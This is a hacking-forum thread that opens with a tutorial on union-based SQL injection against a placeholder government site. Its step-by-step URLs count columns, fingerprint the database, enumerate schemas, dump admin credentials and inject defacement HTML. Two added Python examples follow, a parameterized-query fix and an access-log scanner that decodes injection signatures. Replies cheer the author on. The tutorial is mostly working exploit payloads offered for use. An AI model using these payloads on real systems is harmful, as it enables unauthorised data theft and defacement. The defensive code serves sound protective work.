[Tutorial] Advance SQL Injection
Forum rules
Discussing bugs, penetration, exploitation and techniques for securing websites and web servers. Include a POC here so members can learn from it.
[Tutorial] Advance SQL Injection
This paper is the advanced follow-up to my first article. In this tutorial, we will try to get deeper into the website than normal using SQL Injection.
1. The target is http://www.victim.gov/agent_detail.php?aid=9
We check whether the site has a bug. We only need to add a single quote at the end of the URL. So the URL becomes:
http://www.victim.gov/agent_detail.php?aid=9'
And an error appears.
2. We check the number of columns of that site.
To check the number of columns, we use "order by". Don't forget to add (-) after = and (--) at the end of the URL.
URL:
http://www.victim.gov/agent_detail.php?aid=-9 order by 1-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 2-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 3-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 4-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 5-- //no error appear
http://www.victim.gov/agent_detail.php?aid=-9 order by 6-- //error appear
Because with "order by 6" an error appeared, the number of columns is 5. The formula is n-1, where n is the order by number at which the error appears.
3. We check the number that is exploitable.
We use "union all select".
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!--
so:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5--
The 1,2,3,4,5 comes from number_of_column; if number_of_column is 3, the query will be "union all select 1,2,3".
Number 3 appears. So 3 is the exploitable number.
4. We check the version of that site.
We use "version()". We only need to replace the exploitable number with version().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5--
and it shows:
5.0.45-community-nt. We are lucky. We will be able to learn the names of the database, tables, and columns.
5. We check the user of that site.
We use "user()". We only need to replace the exploitable number with user().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5--
and it shows:
root@localhost.
so the username is root.
6. We check the default database.
We use "database()". We only need to replace the exploitable number with database().
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5--
and it shows: "news"
so the default database of that site is "news".
7. We check all databases on that site.
We use "concat(schema_name) from information_schema.schemata"
We need to replace the exploitable number with "concat(schema_name)" and add "from information_schema.schemata" at the end of the URL.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata--
You will see all databases on that site. Example:
news
information_schema
mysql
cms
connection
shop
etc
8. We check the table names of that site (default database).
This is the query if you want to see the table names of the default database.
We use "concat(table_name) from information_schema.tables where table_schema=database()"
We need to replace the exploitable number with "concat(table_name)" and add "from information_schema.tables where table_schema=database()" at the end of the URL.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()--
You will see the table names of that database. Example:
admin
config
news
etc
9. We check the name of the table (default database).
We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]"
[hexa] is the result when we convert text to hex. For example, the hex of "cms" is 636D73 and the hex of "admin" is 61646D696E.
For example, if the table is "admin", the URL will be:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
And you see the column names in that table. Example:
username
password
email
etc
10. Dump the data (default database).
We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name"
3a is the result of converting ":" to hex; it separates each dumped value. For example, we want to dump the data in table admin, columns username, password, email.
URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin--
And you see:
admin:becareful:[email protected]
the structure:
admin --> username
: --> 0x3a
becareful --> password
: --> 0x3a
[email protected] --> email
We have learned how to dump from the default database. So what about other databases?
11. Check table_name of another database.
For example, the other database is "cms".
We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]", where [hex] is the result of converting the name of the database to hex. The result of converting "cms" to hex is 636D73.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73--
And you see:
cms
cms_order
cms_user
12. Check column_name of the following tables.
For example, the table is "cms_order".
We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]"
The hex of "cms_order" is 636D735F6F72646572. So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572--
You will see:
order_id
order_reff
13. Dump data from the following columns.
For example, the column names are order_id, order_reff.
We use "concat(column_name,0x3a,column_name2) from database.table"
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3a,order_reff),4,5 from cms.cms_order--
You will see the data.
14. Fake deface using SQL injection
We only need to convert HTML to hex.
example: <marquee>xyberbreaker</marquee> hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E
After that, replace the exploitable number with it.
So the URL:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5--
You will see something good.
The end.
/////////////////////////////////////////////////////////////////////////////////////////
THIS IS FOR EDUCATIONAL PURPOSES ONLY. I AM NOT RESPONSIBLE FOR ANYTHING READERS DO.
"Whoever uses this for crime bears the sin alone."
http://xyber-breaker.blogspot.com
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org
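The defect behind the walkthrough above is a query that pastes the aid parameter straight into the SQL text. The following is an added example, not code from the original post or from the site it describes: a Python stand-in for agent_detail.php against an in-memory SQLite table (the table name, column names and sample row are constructed; the five-column SELECT mirrors the "order by 6 fails" result in step 2), with the vulnerable string-built query beside a hardened version that validates the parameter and binds it. The inputs from steps 1 to 3 are run through both so the difference is visible.

```python
import re
import sqlite3

# Constructed stand-in for the tutorial's agent_detail.php query: a SELECT that
# returns five columns, matching the column count the page derives in step 2.
COLUMNS = "name, phone, region, email, notes"


def make_db():
    """Build a throwaway in-memory database with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE agent (aid INTEGER PRIMARY KEY, name TEXT, phone TEXT, "
        "region TEXT, email TEXT, notes TEXT)"
    )
    conn.execute(
        "INSERT INTO agent VALUES (9, 'Agent Nine', '555-0100', 'north', "
        "'nine@example.invalid', 'constructed sample row')"
    )
    return conn


def vulnerable_lookup(conn, aid):
    """The defect the tutorial exploits: the raw aid value becomes part of the SQL text,
    so a quote breaks the statement and a UNION appends attacker-chosen rows."""
    sql = f"SELECT {COLUMNS} FROM agent WHERE aid={aid}"
    return conn.execute(sql).fetchall()


# Hypothetical policy for this handler: aid is a plain non-negative integer.
AID_RE = re.compile(r"\d{1,10}")


def hardened_lookup(conn, aid):
    """Fix: reject anything that is not an integer, then bind the value as a parameter
    so the database driver never interprets it as SQL."""
    if not isinstance(aid, str) or not AID_RE.fullmatch(aid):
        raise ValueError("aid must be a non-negative integer")
    sql = f"SELECT {COLUMNS} FROM agent WHERE aid=?"
    return conn.execute(sql, (int(aid),)).fetchall()


def probe(conn, aid):
    """Run one aid value through both handlers; returns (vulnerable, hardened) outcomes,
    each a (kind, detail) pair where kind is 'rows', 'db_error' or 'rejected'."""
    try:
        vuln = ("rows", vulnerable_lookup(conn, aid))
    except sqlite3.Error as exc:
        vuln = ("db_error", str(exc))
    try:
        hard = ("rows", hardened_lookup(conn, aid))
    except ValueError as exc:
        hard = ("rejected", str(exc))
    return vuln, hard


# The parameter values from steps 1 to 3 of the post, as the application sees them.
PAYLOADS = [
    "9",
    "9'",
    "-9 order by 5--",
    "-9 order by 6--",
    "-9 union all select 1,2,3,4,5--",
]

if __name__ == "__main__":
    db = make_db()
    for value in PAYLOADS:
        print(repr(value), "->", probe(db, value))
```

Running it shows the three behaviours the post relies on, all coming from the vulnerable handler only: the quote produces a database error, "order by 5" succeeds while "order by 6" errors (which is how the column count leaks), and the UNION returns the marker row (1, 2, 3, 4, 5). The hardened handler rejects every one of those inputs before any SQL runs, and a plain "9" still returns the real row from both. SQLite has no information_schema, so the later steps are not reproduced here; the fix is the same for them, because a bound integer can never carry a UNION.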
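On the detection side, every step of the post leaves a recognisable request in the web server's access log. The following is also an added example rather than anything from the post: a small Python scanner over constructed combined-format log lines carrying the request shapes shown above (client IP, timestamps and byte counts are made up), which flags the signatures visible in each query parameter (a stray quote, order-by probing, union select, the version()/user()/database() fingerprint calls, information_schema, 0x hex literals, a trailing comment) and decodes the hex literals so an analyst can read which object names a request referred to.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines mirroring the tutorial's requests (steps 1, 2, 4 and 9).
LOG_LINES = [
    '10.0.0.5 - - [12/Jun/2009:10:01:02 +0700] "GET /agent_detail.php?aid=9 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Jun/2009:10:01:09 +0700] "GET /agent_detail.php?aid=9%27 HTTP/1.1" 500 311',
    '10.0.0.5 - - [12/Jun/2009:10:01:30 +0700] "GET /agent_detail.php?aid=-9+order+by+6-- HTTP/1.1" 500 311',
    '10.0.0.5 - - [12/Jun/2009:10:02:11 +0700] "GET /agent_detail.php?aid=-9+union+all+select+1,2,version(),4,5-- HTTP/1.1" 200 4870',
    '10.0.0.5 - - [12/Jun/2009:10:03:40 +0700] "GET /agent_detail.php?aid=-9+union+all+select+1,2,concat(column_name),4,5+from+information_schema.columns+where+table_name=0x61646D696E-- HTTP/1.1" 200 4990',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r"0x((?:[0-9a-fA-F]{2})+)\b")

# Signatures are matched against the lower-cased, URL-decoded parameter value.
SIGNATURES = [
    ("quote", re.compile(r"'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("fingerprint_fn", re.compile(r"\b(?:version|user|database)\(\)")),
    ("information_schema", re.compile(r"\binformation_schema\b")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}")),
    ("comment_tail", re.compile(r"--\s*$")),
]


def decode_hex_literals(value):
    """Turn MySQL-style 0x.. literals into text so the referenced names are readable."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL_RE.findall(value)]


def analyze(line):
    """Return one finding per suspicious query parameter in a log line (empty list if clean)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    findings = []
    # parse_qsl splits on the first '=' per pair and decodes %xx and '+' for us.
    for name, value in parse_qsl(query, keep_blank_values=True):
        lowered = value.lower()
        matched = [label for label, rx in SIGNATURES if rx.search(lowered)]
        if matched:
            findings.append({
                "param": name,
                "value": value,
                "signatures": matched,
                "hex_decoded": decode_hex_literals(value),
            })
    return findings


def scan(lines):
    """Pairs of (line index, findings) for every line that produced a finding."""
    results = []
    for index, line in enumerate(lines):
        findings = analyze(line)
        if findings:
            results.append((index, findings))
    return results


if __name__ == "__main__":
    for index, findings in scan(LOG_LINES):
        for finding in findings:
            print(index, finding["param"], finding["signatures"],
                  finding["hex_decoded"], repr(finding["value"]))
```

The first line (a normal aid=9 request) produces no finding; the other four are flagged, and the last one's hex literal decodes to "admin", the table name the request was enumerating columns for. The sequence of a 500 on the quoted request followed by order-by probes and then union selects from one client is the pattern worth alerting on, rather than any single signature on its own.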
Re: Advance SQL Injection
amazing
Develop your interest and prove your ability
Never stop by at http://elco.teknikelektronika.net and http://replayfrom.wordpress.com
Thanks
Re: Advance SQL Injection
wuih.. ckckckck
.::. My Sign .::.
..noobie Pool..
Using tools or not isn't the issue; what matters is understanding what you're doing
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
Re: [Tutorial] Advance SQL Injection
I've actually read this before....Heh..
Keep sharing bro... :kaca: :kaca:
carry on the journey... :ngakak: :tapa:
regards,
ordinary user,-
Re: [Tutorial] Advance SQL Injection
newbie reading along, bro...
Re: [Tutorial] Advance SQL Injection
@wiLMaR_kiDz, where did you read it, bro?
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org
- wiLMaR_kiDz
- Posts: 964
- Joined: Fri Mar 27, 2009 1:03 pm
- Location: internet
Re: [Tutorial] Advance SQL Injection
adwisatya wrote: @wiLMaR_kiDz, where did you read it, bro?
at: http://xyber-breaker.blogspot.com/2009/ ... ction.html
in other words, your own blog, bro...
sorry, I didn't check first.. :putusasa: :putusasa:
so embarrassing....
:malumalu: :malumalu: :malumalu:
regards,
ordinary user,-
Re: [Tutorial] Advance SQL Injection
awesome bro, go hit it while you're at it
[b]Ukhuwah Networking Group Indonesia[/b]
Address : Jalan Makmur Nomor 41 Kota Makassar Sulawesi Selatan
Home : 0411-454414 - 04112409679
[b]Hasbullah Masby[/b]
SMS : 087841085044
YM : [URL=ymsgr:sendIM?email.abah][img]http://www.software.ukhuwah.net/ym/online.gif[/img][/URL]
Re: [Tutorial] Advance SQL Injection
hhihihi,,
no need to be embarrassed bro, just relax....
,,
if anything is missing, please add to it..
i'm not hacker, but i want to be hacker
http://www.lumajangcrew.org
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
Re: [Tutorial] Advance SQL Injection
abah wrote: awesome bro, go hit it while you're at it
Whoa, abah just wants to go straight to attacking, what's the matter, abah...???
Remember, abah, you're already old; just think of Kayla and Ummi at home, abah...
...n0 l1m17...